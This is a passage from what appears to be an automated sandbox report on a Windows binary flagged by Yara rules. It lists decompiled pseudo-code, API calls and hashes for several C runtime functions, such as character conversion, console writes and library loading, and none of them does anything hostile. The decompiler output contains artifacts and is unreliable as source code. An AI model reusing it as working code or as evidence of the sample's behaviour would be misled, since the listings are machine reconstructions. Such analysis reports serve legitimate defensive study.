                                                                    0x00407ac7
                                                                    0x00407ad2
                                                                    0x00407ada
                                                                    0x0040793a
                                                                    0x0040793a
                                                                    0x0040793d
                                                                    0x00407942
                                                                    0x00407946
                                                                    0x0040799a
                                                                    0x0040799a
                                                                    0x0040799c
                                                                    0x0040799e
                                                                    0x00407abc
                                                                    0x00407abc
                                                                    0x00407abe
                                                                    0x00407abf
                                                                    0x00407ac5
                                                                    0x00000000
                                                                    0x00407ac5
                                                                    0x004079af
                                                                    0x004079b5
                                                                    0x004079b7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079bd
                                                                    0x004079cf
                                                                    0x004079d4
                                                                    0x004079d8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079e5
                                                                    0x00407a1f
                                                                    0x00407a22
                                                                    0x00407a25
                                                                    0x00407a27
                                                                    0x00407a29
                                                                    0x00407a2b
                                                                    0x00407a77
                                                                    0x00407a77
                                                                    0x00407a79
                                                                    0x00407a79
                                                                    0x00407a7b
                                                                    0x00407ab5
                                                                    0x00407ab6
                                                                    0x00000000
                                                                    0x00407abb
                                                                    0x00407a8f
                                                                    0x00407a94
                                                                    0x00407a96
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a9a
                                                                    0x00407a9b
                                                                    0x00407a9c
                                                                    0x00407a9f
                                                                    0x00407adb
                                                                    0x00407ade
                                                                    0x00407aa1
                                                                    0x00407aa1
                                                                    0x00407aa2
                                                                    0x00407aa2
                                                                    0x00407aaf
                                                                    0x00407ab1
                                                                    0x00407ab3
                                                                    0x00407ae4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407ab3
                                                                    0x00407a2d
                                                                    0x00407a30
                                                                    0x00407a32
                                                                    0x00407a34
                                                                    0x00407a36
                                                                    0x00407a39
                                                                    0x00407a3e
                                                                    0x00407a59
                                                                    0x00407a5b
                                                                    0x00407a65
                                                                    0x00407a67
                                                                    0x00407a68
                                                                    0x00407a6a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a6c
                                                                    0x00407a72
                                                                    0x00407a72
                                                                    0x00000000
                                                                    0x00407a72
                                                                    0x00407a40
                                                                    0x00407a42
                                                                    0x00407a46
                                                                    0x00407a4b
                                                                    0x00407a4d
                                                                    0x00407a4f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a51
                                                                    0x00000000
                                                                    0x00407a51
                                                                    0x004079e7
                                                                    0x004079ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079f2
                                                                    0x004079f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a10
                                                                    0x00407a14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a1a
                                                                    0x0040794d
                                                                    0x0040794f
                                                                    0x00407951
                                                                    0x00407959
                                                                    0x00407978
                                                                    0x0040797a
                                                                    0x00407984
                                                                    0x00407986
                                                                    0x00407987
                                                                    0x00407989
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040798f
                                                                    0x00407995
                                                                    0x00407995
                                                                    0x00000000
                                                                    0x00407995
                                                                    0x0040795d
                                                                    0x00407961
                                                                    0x00407966
                                                                    0x0040796a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407970
                                                                    0x00000000
                                                                    0x00407970

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                    • __alloca_probe_16.LIBCMT ref: 00407961
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                    • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                    • __freea.LIBCMT ref: 00407AB6
                                                                      • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    • __freea.LIBCMT ref: 00407ABF
                                                                    • __freea.LIBCMT ref: 00407AE4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3864826663-0
                                                                    • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                    • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                    • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                    • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x4f99ddef
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                                                                    0x0040822b
                                                                    0x00408232
                                                                    0x00408235
                                                                    0x0040823d
                                                                    0x00408241
                                                                    0x0040824d
                                                                    0x00408250
                                                                    0x00408253
                                                                    0x0040825a
                                                                    0x00408262
                                                                    0x00408265
                                                                    0x0040826b
                                                                    0x00408271
                                                                    0x00408276
                                                                    0x00408278
                                                                    0x0040827b
                                                                    0x00408280
                                                                    0x0040828a
                                                                    0x00408291
                                                                    0x00408294
                                                                    0x0040829b
                                                                    0x004082a2
                                                                    0x004082ce
                                                                    0x004082f4
                                                                    0x004082f6
                                                                    0x00000000
                                                                    0x004082d0
                                                                    0x004082d3
                                                                    0x0040839a
                                                                    0x004083a6
                                                                    0x004083b1
                                                                    0x004083b6
                                                                    0x004082d9
                                                                    0x004082e0
                                                                    0x004082e5
                                                                    0x004082eb
                                                                    0x004082f1
                                                                    0x00000000
                                                                    0x004082f1
                                                                    0x004082eb
                                                                    0x004082d3
                                                                    0x004082a4
                                                                    0x004082a8
                                                                    0x004082ab
                                                                    0x004082b1
                                                                    0x004082b3
                                                                    0x004082b6
                                                                    0x004082ba
                                                                    0x004082f7
                                                                    0x004082fa
                                                                    0x004082fb
                                                                    0x00408300
                                                                    0x00408306
                                                                    0x0040830c
                                                                    0x0040831b
                                                                    0x00408321
                                                                    0x00408327
                                                                    0x0040832c
                                                                    0x00408348
                                                                    0x004083bb
                                                                    0x004083c1
                                                                    0x0040834a
                                                                    0x00408352
                                                                    0x0040835b
                                                                    0x00408361
                                                                    0x00000000
                                                                    0x00408363
                                                                    0x00408365
                                                                    0x00408368
                                                                    0x00408381
                                                                    0x00000000
                                                                    0x00408383
                                                                    0x00408387
                                                                    0x00408389
                                                                    0x0040838c
                                                                    0x00000000
                                                                    0x0040838c
                                                                    0x00408387
                                                                    0x00408381
                                                                    0x00408361
                                                                    0x0040835b
                                                                    0x00408348
                                                                    0x0040832c
                                                                    0x00408306
                                                                    0x00000000
                                                                    0x0040838f
                                                                    0x0040838f
                                                                    0x004083c3
                                                                    0x004083cd
                                                                    0x004083d5

                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                    • __fassign.LIBCMT ref: 004082E0
                                                                    • __fassign.LIBCMT ref: 004082FB
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                    • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                    • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                    • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                    • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                    • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 27%
                                                                    			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x4f99ddef
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                                                                    0x00403639
                                                                    0x00403640
                                                                    0x00403643
                                                                    0x00403647
                                                                    0x00403652
                                                                    0x0040365a
                                                                    0x00403665
                                                                    0x0040366b
                                                                    0x0040366f
                                                                    0x00403676
                                                                    0x0040367c
                                                                    0x0040367c
                                                                    0x0040367e
                                                                    0x00403683
                                                                    0x00403688
                                                                    0x00403688
                                                                    0x00403693
                                                                    0x0040369b

                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                    • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                                    • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                    • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x4f99ddef
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                                                                    0x004062c0
                                                                    0x004062c7
                                                                    0x004062ca
                                                                    0x004062d3
                                                                    0x004062d8
                                                                    0x004062dd
                                                                    0x004062e2
                                                                    0x004062e5
                                                                    0x004062e7
                                                                    0x004062e7
                                                                    0x004062ec
                                                                    0x00406305
                                                                    0x0040630b
                                                                    0x00406310
                                                                    0x004063af
                                                                    0x004063b3
                                                                    0x004063b8
                                                                    0x004063b8
                                                                    0x004063cc
                                                                    0x004063d4
                                                                    0x004063d4
                                                                    0x00406316
                                                                    0x00406319
                                                                    0x0040631e
                                                                    0x00406322
                                                                    0x0040636e
                                                                    0x00406370
                                                                    0x00406372
                                                                    0x00406377
                                                                    0x0040638e
                                                                    0x00406396
                                                                    0x004063a6
                                                                    0x004063a6
                                                                    0x00406396
                                                                    0x004063a8
                                                                    0x004063a9
                                                                    0x00000000
                                                                    0x004063ae
                                                                    0x00406324
                                                                    0x00406329
                                                                    0x0040632b
                                                                    0x0040632d
                                                                    0x0040632d
                                                                    0x00406335
                                                                    0x00406352
                                                                    0x0040635c
                                                                    0x00406361
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406363
                                                                    0x00406369
                                                                    0x00406369
                                                                    0x00000000
                                                                    0x00406369
                                                                    0x00406339
                                                                    0x0040633d
                                                                    0x00406342
                                                                    0x00406346
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406348
                                                                    0x00000000

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                    • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                    • __freea.LIBCMT ref: 004063A9
                                                                      • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                    • String ID:
                                                                    • API String ID: 313313983-0
                                                                    • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                    • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                                    • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                    • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 95%
                                                                    			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x4f99ddf0
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                                    0x00405756
                                                                    0x0040575a
                                                                    0x00405761
                                                                    0x00405765
                                                                    0x00405773
                                                                    0x00405789
                                                                    0x0040578d
                                                                    0x004057b6
                                                                    0x004057b8
                                                                    0x004057bc
                                                                    0x004057bf
                                                                    0x004057bf
                                                                    0x004057c5
                                                                    0x004057c7
                                                                    0x00000000
                                                                    0x004057c8
                                                                    0x0040578f
                                                                    0x00405798
                                                                    0x004057a7
                                                                    0x0040579a
                                                                    0x0040579d
                                                                    0x004057a3
                                                                    0x004057a3
                                                                    0x004057ab
                                                                    0x00000000
                                                                    0x004057ad
                                                                    0x004057b0
                                                                    0x004057b2
                                                                    0x00000000
                                                                    0x004057b2
                                                                    0x004057ab
                                                                    0x00405767
                                                                    0x0040576c
                                                                    0x00000000

                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                    • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                    • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                                    • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                    • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                                    0x00404320
                                                                    0x00404320
                                                                    0x00404320
                                                                    0x0040432a
                                                                    0x0040432c
                                                                    0x00404331
                                                                    0x00404334
                                                                    0x00404342
                                                                    0x00404349
                                                                    0x0040434e
                                                                    0x00404351
                                                                    0x00404354
                                                                    0x00404366
                                                                    0x0040436b
                                                                    0x0040436d
                                                                    0x00404378
                                                                    0x0040437f
                                                                    0x00404384
                                                                    0x00404387
                                                                    0x00404389
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040436f
                                                                    0x0040436f
                                                                    0x00000000
                                                                    0x0040436f
                                                                    0x00404356
                                                                    0x00404356
                                                                    0x00404357
                                                                    0x00404357
                                                                    0x0040435c
                                                                    0x00404397
                                                                    0x00404398
                                                                    0x0040439e
                                                                    0x004043a3
                                                                    0x004043a6
                                                                    0x004043a7
                                                                    0x004043a8
                                                                    0x004043af
                                                                    0x004043b1
                                                                    0x004043b3
                                                                    0x004043b8
                                                                    0x004043bb
                                                                    0x004043c9
                                                                    0x004043d5
                                                                    0x004043d8
                                                                    0x004043db
                                                                    0x004043ed
                                                                    0x004043f2
                                                                    0x004043f4
                                                                    0x004043ff
                                                                    0x00404405
                                                                    0x0040440d
                                                                    0x0040440f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004043f6
                                                                    0x004043f6
                                                                    0x00000000
                                                                    0x004043f6
                                                                    0x004043dd
                                                                    0x004043dd
                                                                    0x004043de
                                                                    0x004043de
                                                                    0x00404411
                                                                    0x00404412
                                                                    0x00404412
                                                                    0x004043bd
                                                                    0x004043c3
                                                                    0x004043c7
                                                                    0x0040441a
                                                                    0x0040441b
                                                                    0x00404421
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004043c7
                                                                    0x00404428
                                                                    0x00404428
                                                                    0x00404336
                                                                    0x0040433c
                                                                    0x00404340
                                                                    0x0040438b
                                                                    0x0040438c
                                                                    0x00404396
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404340

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                    • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                    • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                    • _abort.LIBCMT ref: 0040439E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$_abort
                                                                    • String ID:
                                                                    • API String ID: 88804580-0
                                                                    • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                    • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                    • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                    • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                    Download Yara Rule
